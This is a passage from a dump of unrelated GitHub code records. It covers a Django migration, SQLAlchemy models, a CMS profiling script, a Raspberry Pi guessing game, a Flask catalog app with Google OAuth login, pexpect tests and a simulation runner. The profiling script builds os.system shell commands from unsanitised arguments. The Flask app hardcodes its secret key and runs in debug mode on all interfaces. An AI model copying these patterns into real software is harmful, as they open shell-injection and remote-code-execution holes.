blank=True)),\n ('description', models.TextField(default=b'', blank=True)),\n ],\n options={\n 'verbose_name': 'Fulfilment',\n 'verbose_name_plural': 'Fulfilments',\n },\n ),\n migrations.CreateModel(\n name='InformationSource',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('url', models.URLField()),\n ('display_name', models.CharField(max_length=512)),\n ('date', models.DateField()),\n ],\n options={\n 'verbose_name': 'Information Source',\n 'verbose_name_plural': 'Information Sources',\n },\n ),\n migrations.CreateModel(\n name='Milestone',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateField()),\n ('description', models.TextField()),\n ],\n options={\n 'ordering': ('date',),\n 'verbose_name': 'Milestone',\n 'verbose_name_plural': 'Milestones',\n },\n ),\n migrations.CreateModel(\n name='Promise',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=2048)),\n ('description', models.TextField(blank=True)),\n ('date', models.DateField(null=True, blank=True)),\n ('order', models.PositiveIntegerField(default=0)),\n ('category', models.ForeignKey(related_name='promises', to='promises.Category', null=True)),\n ('person', models.ForeignKey(to='popolo.Person')),\n ],\n options={\n 'ordering': ('order',),\n 'verbose_name': 'Promise',\n 'verbose_name_plural': 'Promises',\n },\n ),\n migrations.CreateModel(\n name='VerificationDocument',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('url', models.URLField()),\n ('display_name', models.CharField(max_length=512)),\n ('date', models.DateField()),\n ('promise', models.ForeignKey(related_name='verification_documents', to='promises.Promise', null=True)),\n ],\n options={\n 'verbose_name': 'Verification Document',\n 'verbose_name_plural': 'Verification Documents',\n },\n ),\n migrations.AddField(\n model_name='milestone',\n name='promise',\n field=models.ForeignKey(related_name='milestones', to='promises.Promise'),\n ),\n migrations.AddField(\n model_name='informationsource',\n name='promise',\n field=models.ForeignKey(related_name='information_sources', to='promises.Promise'),\n ),\n migrations.AddField(\n model_name='fulfillment',\n name='promise',\n field=models.OneToOneField(to='promises.Promise'),\n ),\n ]\n","repo_name":"ciudadanointeligente/ddah-promises","sub_path":"promises/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15867375642","text":"from sqlalchemy import Column, Integer, ForeignKey, String, Table\nfrom .Base import DeclarativeBase\n\n\n# association table between User and Event\nuser_has_event = Table(\n\t'User_has_Event',\n\tDeclarativeBase.metadata,\n\tColumn('username', String(200), ForeignKey('User.username')),\n\tColumn('event_id', Integer, ForeignKey('Event.event_id'))\n)","repo_name":"s-collins/seminars","sub_path":"services/etl/orm/User_has_Event.py","file_name":"User_has_Event.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7866425113","text":"import yaml\nimport os\nimport sys\n\ndata_path = '/eos/cms/store/user/cmsbuild/profiling/data/'\ncmssw = os.listdir(data_path)\ncmssw.sort(key = lambda x: (x.split('_')[1:4],10-len(x.split('_')),len(x)))\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--operator\", type=str, help=\"operator\", default=None)\nparser.add_argument(\"--workflow\", type=str, help=\"workflow\", default=None)\nparser.add_argument(\"--release\", type=str, help=\"CMSSW release\", default=None)\nargs = parser.parse_args()\n\nnew = args.release\nold = cmssw[cmssw.index(new)-1]\nnew_architecture = os.listdir(os.path.join(data_path,new))[0]\nold_architecture = os.listdir(os.path.join(data_path,old))[0]\nworkflow = args.workflow\noperator = args.operator\n\nresult_path = \"{0}/{1}/{2}/\".format(new,new_architecture,workflow)\n\nfor step in ['step3','step4','step5']:\n\t\n\tnew_data = os.path.join(data_path,new,new_architecture,workflow,'{}_TimeMemoryInfo.log'.format(step))\n\told_data = os.path.join(data_path,old,old_architecture,workflow,'{}_TimeMemoryInfo.log'.format(step))\n\n\tos.makedirs(result_path,exist_ok = True)\n\tif os.path.isfile(new_data) and os.path.isfile(old_data):\n\t\tos.system(\"source ./{8} {0}{2}/{3}/{6}/{7} {0}{4}/{5}/{6}/{7} > {1}{7}.txt\".format(\n\t\tdata_path,result_path,\n\t\told,old_architecture,\n\t\tnew,new_architecture,\n\t\tworkflow,step,operator))\n\n","repo_name":"xoqhdgh1002/cms-reco-profiling-web","sub_path":"jenkins/scripts/comparison/make_compare_data.py","file_name":"make_compare_data.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70729415895","text":"# Import appropriate libraries.\nimport time\nimport random\nfrom rpi_ws281x import PixelStrip, Color\nfrom Adafruit_LED_Backpack import SevenSegment\n\nLED_COUNT = 64 # Number of LED pixels.\nLED_PIN = 12 # GPIO pin connected to the pixels\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz\nLED_DMA = 10 # DMA channel to use for generating signal\nLED_BRIGHTNESS = 10 # Set to 0 for darkest and 255 for brightest\nLED_INVERT = False # True to invert the signal (when using NPN\nLED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n# Prompt the user for their name and say hello.\nname = input(\"Hello! What is your name?\\n\")\nprint(\"Hello there \" + name + \"! I am thinking of a number between 1 and 100.\")\n\n# Prepare the game's variables.\nmy_number = random.randint(1, 100)\nguess_history = []\n\nstrip = PixelStrip(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)\nstrip.begin()\n\ndef colorAll(strip, color):\n \"\"\"Wipe color across display a pixel at a time.\"\"\"\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, color)\n strip.show()\n\n\nsegment = SevenSegment.SevenSegment(address=0x70)\n# Initialize the display. Must be called once before using the display.\nsegment.begin()\nsegment.set_digit(3, 0)\nsegment.set_digit(2, 1)\nsegment.write_display()\n# Begin the guessing loop with 10 tries.\nfor guess_count in range(1, 11):\n # Prompt the user for a number.\n valid_guess = False\n while not valid_guess:\n # Validate user input.\n try:\n number_guessed = int(input(\"Take a guess...\\n\"))\n valid_guess = True\n except ValueError:\n # The user didn't give us a number!\n print(\"Please provide a valid number.\")\n\n # Find out how close the user was to the real number.\n guess_difference = abs(my_number - number_guessed)\n\n # Add this guess to the guess history list.\n guess_history.append(number_guessed)\n\n # Check how close the guess is.\n if number_guessed < my_number and guess_difference > 10:\n colorAll(strip, Color(255, 0, 0))\n print(\"Your guess is very low. Try again.\")\n elif number_guessed > my_number and guess_difference > 10:\n colorAll(strip, Color(255, 0, 0))\n print(\"Your guess is very high. Try again.\")\n elif number_guessed < my_number and guess_difference <= 10:\n colorAll(strip, Color(255, 0, 0))\n print(\"You're close, but your guess is too low. Try again.\")\n elif number_guessed > my_number and guess_difference <= 10:\n colorAll(strip, Color(255, 0, 0))\n print(\"You're close, but your guess is too high. Try again.\")\n else:\n # They guessed the number correctly!\n break\n segment.clear()\n segment.set_digit(3, 10 - guess_count)\n segment.write_display()\n\n# Check if a correct guess was made.\nif number_guessed == my_number:\n colorAll(strip, Color(0, 255, 0)) # Green wipe\n print(\"Great job \" + name + \"! You guessed my number in \" + str(guess_count) + \" guesses.\")\n print(\"Your guesses were: \" + \" \".join(str(i) for i in guess_history))\n time.sleep(3)\n colorAll(strip, Color(0, 0, 0))\n segment.clear()\n segment.write_display()\nelse:\n print(\"Sorry! You didn't guess my number. The number I am thinking of is \" + str(my_number) + \".\")\n time.sleep(3)\n colorAll(strip, Color(0, 0, 0))\n segment.clear()\n segment.write_display()\n","repo_name":"farinaanthony96/Sales_Associate_Projects","sub_path":"src/guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6987158261","text":"#!/usr/bin/env python3\nimport os\nfrom flask import Flask, render_template, request, redirect, jsonify, \\\n url_for, flash, send_from_directory\nfrom werkzeug.utils import secure_filename\n\nfrom sqlalchemy import create_engine, asc\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Brand, Model, User\n\nfrom flask import session as login_session\nimport random\nimport string\n\n# from oauth2client import client\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nfrom flask import make_response\nimport requests\nimport logging\n\nUPLOAD_FOLDER = 'static'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read())['web']['client_id']\n\n# Connect to Database and create database session\nengine = create_engine('postgresql://computershop:12345@localhost/catalog')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\n\n\n# Create a state token to prevent request\n# Store it in the session for later\n@app.route('/login')\ndef show_login():\n \"\"\" Create state token and store it in session.\"\"\"\n\n state = ''.join(random.choice(string.ascii_uppercase + string.\n digits) for x in range(32))\n login_session['state'] = state\n # Render the login template\n return render_template('login.html', STATE=state)\n\n\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n \"\"\"Connect with google.\"\"\"\n # Validate state token\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n # Obtain authorization code\n code = request.data\n\n try:\n # Upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(\n json.dumps('Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check that the access token is valid.\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1])\n # If there was an error in the access token info, abort.\n if result.get('error') is not None:\n response = make_response(json.dumps(\n result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\n \"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for this app.\n if result['issued_to'] != CLIENT_ID:\n response = make_response(\n json.dumps(\"Token's client ID does not match app's.\"), 401)\n logging.info(\"Token's client ID does not match app's.\")\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_access_token = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_access_token is not None and gplus_id == stored_gplus_id:\n response = make_response(json.dumps(\n 'Current user is already connected.'),\n 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Store the access token in the session for later use.\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n # ADD PROVIDER TO LOGIN SESSION\n # login_session['provider'] = 'google'\n\n # see if user exists, if it doesn't make a new one\n user_id = get_user_id(data[\"email\"])\n if user_id is None:\n user_id = create_user(login_session)\n login_session['userid'] = user_id\n\n output = ''\n output += '

    Welcome, '\n output += login_session['username']\n output += '!

    '\n output += ''\n flash(\"you are now logged in as %s\" % login_session['username'])\n logging.info(\"done!\")\n return output\n\n\n# User Helper Functions\n\n# DISCONNECT - Revoke a current user's token and reset their login_session\n\n\n@app.route('/gdisconnect')\ndef gdisconnect():\n \"\"\"Disconnect from google.\"\"\"\n # Only disconnect a connected user.\n access_token = login_session.get('access_token')\n if access_token is None:\n response = make_response(\n json.dumps('Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n if result['status'] == '200':\n response = make_response(json.dumps(\n 'Successfully disconnected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n else:\n response = make_response(json.dumps(\n 'Failed to revoke token for given user.'), 400)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n\n# Disconnect based on provider\n@app.route('/disconnect')\ndef disconnect():\n \"\"\"Delete stored session.\"\"\"\n del login_session['access_token']\n del login_session['username']\n del login_session['userid']\n del login_session['picture']\n del login_session['email']\n del login_session['gplus_id']\n del login_session['state']\n\n flash(\"You have successfully been logged out.\")\n return redirect(url_for('show_brands'))\n\n\n# User Helper Functions\ndef create_user(login_session):\n \"\"\"create new user and return user id.\"\"\"\n session = DBSession()\n new_user = User(name=login_session['username'], email=login_session[\n 'email'], picture=login_session['picture'])\n session.add(new_user)\n session.commit()\n user = session.query(User).filter_by(\n email=login_session['email']).one_or_none()\n return user.id\n\n\ndef get_user_info(user_id):\n \"\"\"Return user information\"\"\"\n\n session = DBSession()\n user = session.query(User).filter_by(id=user_id).one_or_none()\n return user\n\n\ndef get_user_id(email):\n \"\"\"Return user id.\"\"\"\n\n session = DBSession()\n user = session.query(User).filter_by(email=email).one_or_none()\n if user is None:\n return None\n return user.id\n\n\n# JSON APIs to view Brand Information\n@app.route('/brand//model/JSON')\ndef brand_json(brand_id):\n \"\"\"Returns Laptop Models in a JSON Format\"\"\"\n session = DBSession()\n # brand = session.query(Brand).filter_by(id = brand_id).one()\n models = session.query(Model).filter_by(brand_id=brand_id).all()\n return jsonify(Models=[i.serialize for i in models])\n\n\n@app.route('/brand//model//JSON')\ndef model_json(brand_id, model_id):\n \"\"\"Returns Laptop Model in a JSON Format\"\"\"\n\n session = DBSession()\n model = session.query(Model).filter_by(id=model_id).one()\n return jsonify(Model=model.serialize)\n\n\n@app.route('/brand/JSON')\ndef brands_json():\n session = DBSession()\n brands = session.query(Brand).all()\n return jsonify(brands=[r.serialize for r in brands])\n\n\n# Show all brands\n@app.route('/')\n@app.route('/brand/')\ndef show_brands():\n \"\"\"Render brands.Html with permission (edit, delete).\"\"\"\n session = DBSession()\n brands = session.query(Brand).order_by(asc(Brand.name))\n\n if 'username' not in login_session:\n return render_template('brands.html', brands=brands,\n is_admin=False)\n else:\n return render_template('brands.html', brands=brands,\n is_admin=True)\n\n\n@app.route('/static/')\ndef send_file(filename):\n \"\"\"Return photo path.\"\"\"\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\n\n# Create a new brand\n@app.route('/brand/new/', methods=['GET', 'POST'])\ndef new_brand():\n \"\"\"Add new Laptop brand.\"\"\"\n try:\n session = DBSession()\n if request.method == 'POST':\n name = request.form['name']\n if name != '':\n file = request.files['photo']\n # if user does not select file, browser also\n # submit a empty part without filename\n # if file.filename == '':\n # flash('No selected file')\n # return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(name +\n file.filename).replace(\" \", \"\")\n photo = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n file.save(photo)\n else:\n flash('File Extention is not allowed')\n newbrand = Brand(name=request.form['name'], photo=filename,\n user_id=login_session['userid'])\n session.add(newbrand)\n session.commit()\n flash('New Brand %s Successfully Created' % newbrand.name)\n return redirect(url_for('show_brands'))\n else:\n return render_template('brandNew.html')\n except Exception as ex:\n return logging.error(str(ex))\n\n\n# Edit brand\n@app.route('/brand//edit/', methods=['GET', 'POST'])\ndef edit_brand(brand_id):\n \"\"\"Edit brand if the created user is the same as the editing user.\"\"\"\n session = DBSession()\n edited_brand = session.query(Brand).filter_by(id=brand_id).one()\n if request.method == 'POST':\n created_user = edited_brand.user_id\n logged_user = login_session['userid']\n if created_user != logged_user:\n flash('You are not authorized to edit')\n return redirect(url_for('show_brands'))\n\n edit_btn = request.form.get('edit')\n if edit_btn is not None:\n if request.form['name']:\n edited_brand.name = request.form['name']\n edited_brand.user_id = login_session['userid']\n session.commit()\n flash('Brand Successfully Edited %s' % edited_brand.name)\n return redirect(url_for('show_brands'))\n else:\n return render_template('brandEdit.html', brand=edited_brand)\n\n\n# Delete brand and its models\n@app.route('/brand//delete/', methods=['GET', 'POST'])\ndef delete_brand(brand_id):\n \"\"\"Delete brand if the created user is the same as the deleting user.\"\"\"\n session = DBSession()\n deleted_brand = session.query(Brand).filter_by(id=brand_id).one()\n if request.method == 'POST':\n delete_btn = request.form.get('delete')\n creadted_user = deleted_brand.user_id\n logged_user = login_session['userid']\n if creadted_user != logged_user:\n flash('You are not authorized to delete')\n return redirect(url_for('show_brands', brand_id=brand_id))\n if delete_btn is not None:\n delete_btn = request.form.get('delete')\n if delete_btn is not None:\n session.delete(deleted_brand)\n flash('%s Successfully Deleted' % deleted_brand.name)\n session.commit()\n return redirect(url_for('show_brands', brand_id=brand_id))\n\n else:\n return render_template('brandDelete.html', brand=deleted_brand)\n\n\n# Show a brand model\n@app.route('/brand//')\n@app.route('/brand//model/')\ndef show_model(brand_id):\n \"\"\"Render model.Html with user permission (edit, delete).\"\"\"\n session = DBSession()\n brand = session.query(Brand).filter_by(id=brand_id).one()\n models = session.query(Model).filter_by(brand_id=brand_id).all()\n\n user = get_user_info(brand.user_id)\n\n if 'userid' in login_session:\n userid_session = login_session['userid']\n if not user or 'username' not in login_session or \\\n brand.user_id != userid_session:\n return render_template('model.html', models=models, brand=brand,\n creator=user, is_admin=False)\n else:\n return render_template('model.html', models=models, brand=brand,\n creator=user, is_admin=True)\n else:\n return render_template('model.html', models=models, brand=brand,\n creator=user, is_admin=False)\n\n\n# Create a new brand model\n@app.route('/brand//model/new/', methods=['GET', 'POST'])\ndef new_model(brand_id):\n \"\"\"Add new laptop model.\"\"\"\n session = DBSession()\n # brand = session.query(Brand).filter_by(id = brand_id).one()\n if request.method == 'POST':\n file = request.files['photo']\n # if user does not select file, browser also\n # submit a empty part without filename\n # if file.filename == '':\n # flash('No selected file')\n # return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(request.form['name'] +\n file.filename).replace(\" \", \"\")\n photo = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n file.save(photo)\n\n newmodel = Model(name=request.form['name'],\n description=request.form['description'],\n price=request.form['price'],\n photo=filename, brand_id=brand_id)\n session.add(newmodel)\n session.commit()\n flash('New Labtop Model %s Item Successfully Created' %\n newmodel.name)\n return redirect(url_for('show_model', brand_id=brand_id))\n else:\n flash('Brand must have a logo')\n return render_template('modelNew.html', brand_id=brand_id)\n else:\n return render_template('modelNew.html', brand_id=brand_id)\n\n\n# helper for allowed photos ext.\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n# Edit a brand model\n@app.route('/brand//model//edit',\n methods=['GET', 'POST'])\ndef edit_model(brand_id, model_id):\n \"\"\"Modify laptop model only\n\n if the created user is the same as the editing user.\n \"\"\"\n session = DBSession()\n edited_model = session.query(Model).filter_by(id=model_id).one()\n if request.method == 'POST':\n edit_btn = request.form.get('edit')\n creadted_user = edited_model.user_id\n logged_user = login_session['userid']\n if creadted_user != logged_user:\n flash('You are not authorized to edit')\n return redirect(url_for('show_model', brand_id=brand_id))\n if edit_btn is not None:\n if request.form['name']:\n edited_model.name = request.form['name']\n if request.form['description']:\n edited_model.description = request.form['description']\n if request.form['price']:\n edited_model.price = request.form['price']\n edit_model.user_id = login_session['userid']\n # if 'photo' not in request.files:\n # flash('No file part')\n # return redirect(request.url)\n file = request.files['photo']\n # if user does not select file, browser also\n # submit a empty part without filename\n # if file.filename == '':\n # flash('No selected file')\n # return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(request.form['name'] +\n file.filename).replace(\" \", \"\")\n photo = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n file.save(photo)\n edited_model.photo = filename\n session.add(edited_model)\n session.commit()\n flash('Menu Item Successfully Edited')\n return redirect(url_for('show_model', brand_id=brand_id))\n else:\n return render_template('modelEdit.html', brand_id=brand_id,\n model_id=model_id, model=edited_model)\n\n\n# Delete brand Model\n@app.route('/brand//model//delete',\n methods=['GET', 'POST'])\ndef delete_model(brand_id, model_id):\n \"\"\"Remove model\"\"\"\n session = DBSession()\n deleted_model = session.query(Model).filter_by(id=model_id).one()\n\n if request.method == 'POST':\n delete_btn = request.form.get('delete')\n edit_btn = request.form.get('edit')\n creadted_user = deleted_model.user_id\n logged_user = login_session['userid']\n if creadted_user != logged_user:\n flash('You are not authorized to delete')\n return redirect(url_for('show_model', brand_id=brand_id))\n if delete_btn is not None:\n session.delete(deleted_model)\n session.commit()\n flash('Menu Item Successfully Deleted')\n return redirect(url_for('show_model', brand_id=brand_id))\n else:\n return redirect(url_for('show_model', brand_id=brand_id))\n else:\n return render_template('modelDelete.html', model=deleted_model)\n\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"SamehPierre/item_catalog","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":18548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1108695881","text":"import matplotlib.pyplot as plt\nfrom scipy.signal import correlate\nimport numpy as np\ndef PlotAutoCorr(samples,n,L):\n\t# normalise samples\n\tnormed_samples = (samples - np.mean(samples,axis=0))/np.std(samples,axis=0)\n\t# calculate autocorrelation\n\tcorr = correlate(normed_samples,normed_samples,mode='same',method='fft')/(n*L*3)\n\tprint(corr.shape)\n\treturn plt.plot(range(-n//2,n//2),corr)\n\n\nenergy = np.genfromtxt('data/fake/sk_energies.txt')\n#seqs = np.genfromtxt('data/fake/sk_encode.txt',dtype=int)\n\nPlotAutoCorr(energy,100000,1)\n#PlotAutoCorr(seqs[:,0],100000,1)\nplt.savefig('data/fake/sk_autocorr.png')","repo_name":"andrewcboardman/apta_ml","sub_path":"data_stats/check_gen_data.py","file_name":"check_gen_data.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26884571777","text":"import pexpect\nimport unittest\nimport subprocess\nimport sys\nimport os\nfrom . import PexpectTestCase\n\nunicode_type = str if pexpect.PY3 else unicode\n\n\ndef timeout_callback(values):\n if values[\"event_count\"] > 3:\n return 1\n return 0\n\n\ndef function_events_callback(values):\n try:\n previous_echoed = (values[\"child_result_list\"][-1]\n .decode().split(\"\\n\")[-2].strip())\n if previous_echoed.endswith(\"stage-1\"):\n return \"echo stage-2\\n\"\n elif previous_echoed.endswith(\"stage-2\"):\n return \"echo stage-3\\n\"\n elif previous_echoed.endswith(\"stage-3\"):\n return \"exit\\n\"\n else:\n raise Exception(\"Unexpected output {0}\".format(previous_echoed))\n except IndexError:\n return \"echo stage-1\\n\"\n\n\nclass RunFuncTestCase(PexpectTestCase.PexpectTestCase):\n if sys.platform != 'win32':\n runfunc = staticmethod(pexpect.run)\n cr = b'\\r'\n empty = b''\n prep_subprocess_out = staticmethod(lambda x: x)\n\n def setUp(self):\n self.runenv = os.environ.copy()\n self.runenv['PS1'] = 'GO:'\n super(RunFuncTestCase, self).setUp()\n\n def test_run_exit(self):\n (data, exitstatus) = self.runfunc(sys.executable + ' exit1.py', withexitstatus=1)\n assert exitstatus == 1, \"Exit status of 'python exit1.py' should be 1.\"\n\n def test_run(self):\n the_old_way = subprocess.Popen(\n args=['uname', '-m', '-n'],\n stdout=subprocess.PIPE\n ).communicate()[0].rstrip()\n\n (the_new_way, exitstatus) = self.runfunc(\n 'uname -m -n', withexitstatus=1)\n the_new_way = the_new_way.replace(self.cr, self.empty).rstrip()\n\n self.assertEqual(self.prep_subprocess_out(the_old_way), the_new_way)\n self.assertEqual(exitstatus, 0)\n\n def test_run_callback(self):\n # TODO it seems like this test could block forever if run fails...\n events = {pexpect.TIMEOUT: timeout_callback}\n self.runfunc(\"cat\", timeout=1, events=events)\n\n def test_run_bad_exitstatus(self):\n (the_new_way, exitstatus) = self.runfunc(\n 'ls -l /najoeufhdnzkxjd', withexitstatus=1)\n assert exitstatus != 0\n\n def test_run_event_as_string(self):\n events = [\n # second match on 'abc', echo 'def'\n ('abc\\r\\n.*GO:', 'echo \"def\"\\n'),\n # final match on 'def': exit\n ('def\\r\\n.*GO:', 'exit\\n'),\n # first match on 'GO:' prompt, echo 'abc'\n ('GO:', 'echo \"abc\"\\n')\n ]\n\n (data, exitstatus) = pexpect.run(\n 'bash --norc',\n withexitstatus=True,\n events=events,\n env=self.runenv,\n timeout=10)\n assert exitstatus == 0\n\n def test_run_event_as_function(self):\n events = [\n ('GO:', function_events_callback)\n ]\n\n (data, exitstatus) = pexpect.run(\n 'bash --norc',\n withexitstatus=True,\n events=events,\n env=self.runenv,\n timeout=10)\n assert exitstatus == 0\n\n def test_run_event_as_method(self):\n events = [\n ('GO:', self._method_events_callback)\n ]\n\n (data, exitstatus) = pexpect.run(\n 'bash --norc',\n withexitstatus=True,\n events=events,\n env=self.runenv,\n timeout=10)\n assert exitstatus == 0\n\n def test_run_event_typeerror(self):\n events = [('GO:', -1)]\n with self.assertRaises(TypeError):\n pexpect.run('bash --norc',\n withexitstatus=True,\n events=events,\n env=self.runenv,\n timeout=10)\n\n def _method_events_callback(self, values):\n try:\n previous_echoed = (values[\"child_result_list\"][-1].decode()\n .split(\"\\n\")[-2].strip())\n if previous_echoed.endswith(\"foo1\"):\n return \"echo foo2\\n\"\n elif previous_echoed.endswith(\"foo2\"):\n return \"echo foo3\\n\"\n elif previous_echoed.endswith(\"foo3\"):\n return \"exit\\n\"\n else:\n raise Exception(\"Unexpected output {0!r}\"\n .format(previous_echoed))\n except IndexError:\n return \"echo foo1\\n\"\n\n\nclass RunUnicodeFuncTestCase(RunFuncTestCase):\n if sys.platform != 'win32':\n runfunc = staticmethod(pexpect.runu)\n cr = b'\\r'.decode('ascii')\n empty = b''.decode('ascii')\n prep_subprocess_out = staticmethod(lambda x: x.decode('utf-8', 'replace'))\n\n def test_run_unicode(self):\n if pexpect.PY3:\n char = chr(254) # þ\n pattern = ''\n else:\n char = unichr(254) # analysis:ignore\n pattern = ''.decode('ascii')\n\n def callback(values):\n if values['event_count'] == 0:\n return char + '\\n'\n else:\n return True # Stop the child process\n\n output = pexpect.runu(self.PYTHONBIN + ' echo_w_prompt.py',\n env={'PYTHONIOENCODING': 'utf-8'},\n events={pattern: callback})\n assert isinstance(output, unicode_type), type(output)\n assert ('' + char) in output, output\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pexpect/pexpect","sub_path":"tests/test_run.py","file_name":"test_run.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","stars":2458,"dataset":"github-code","pt":"67"} +{"seq_id":"70740480853","text":"#!/usr/bin/python3\n\nimport os\nimport dynein.run as run\nimport glob\nimport numpy as np\nimport argparse\nimport subprocess\n\ndef latex_format(x):\n if isinstance(x, float) or isinstance(x, int):\n x = '{:e}'.format(x)\n if 'e+0' in x:\n m,e = x.split('e+0')\n if m == '1':\n return r'10^{'+e+'}'\n return m + r'\\times 10^{' + e+ '}'\n if 'e+' in x:\n m,e = x.split('e+')\n if m == '1':\n return r'10^{'+e+'}'\n return m + r'\\times 10^{' + e+ '}'\n if 'e-0' in x:\n m,e = x.split('e-0')\n if m == '1':\n return r'10^{-'+e+'}'\n return m + r'\\times 10^{-' + e+ '}'\n if 'e' in x:\n m,e = x.split('e')\n if m == '1':\n return r'10^{'+e+'}'\n return m + r'\\times 10^{' + e+ '}'\n # if isinstance(x, str):\n # x = x.replace('-', '_')\n return x\n\nparser = argparse.ArgumentParser(description=\"script to generate unbinding probabilities of bb dynein\")\n\nparser.add_argument('-k_b', '--binding', dest='k_b', action='store', type=float,\n default=1e8, help=\"pre-exponential binding constant\", metavar='')\nparser.add_argument('-k_ub', '--unbinding', dest='k_ub', action='store', type=float,\n default=100, help=\"pre-exponential unbinding constant\", metavar='')\nparser.add_argument('-t', '--runtime', dest='runtime', action='store', type=float,\n default=1.0, help='total runtime for simulation in seconds', metavar='')\nparser.add_argument('-exp', '--exp-unbinding-constant', dest='exp_unbinding_constant',\n action='store', type=float, default=0.0, help=\"exponential unbinding constant\", metavar='')\n\nparser.add_argument('-s', '--seed', dest ='seed', action='store', type=float, default=1.0, help =\"random number seed\", metavar='')\nparser.add_argument('-cb', '--cb', dest ='cb', action='store', type=float, default=0.1, help =\"cb\", metavar='')\nparser.add_argument('-cm', '--cm', dest ='cm', action='store', type=float, default=0.4, help =\"cm\", metavar='')\nparser.add_argument('-ct', '--ct', dest ='ct', action='store', type=float, default=0.2, help =\"ct\", metavar='')\n\nparser.add_argument('-l', '--label', dest='label', action='store', type=str, default='default', help=\"label for run\", metavar='')\n\nparser.add_argument('-w', '--writerate', dest='write_rate', action='store', type=str, default=1e6, help=\"writes per second\", metavar='')\n\nargs = parser.parse_args()\n\nif os.path.exists('run-unbinding-rate-simulations.py'):\n os.chdir('../')\nos.system(\"make simulate_unbinding_rates\")\n\nif not os.path.exists('data/unbinding_probability/'):\n os.makedirs('data/unbinding_probability/')\n\nfor L in [1, 5, 10, 15, 20, 25, 30, 35, 40]:\n basename = \"%s__L-%s,s-%s\" % (args.label, str(L), args.seed)\n\n cmd = [\"./simulate_unbinding_rates\",\n \"--label\", \"%s\" % str(args.label),\n 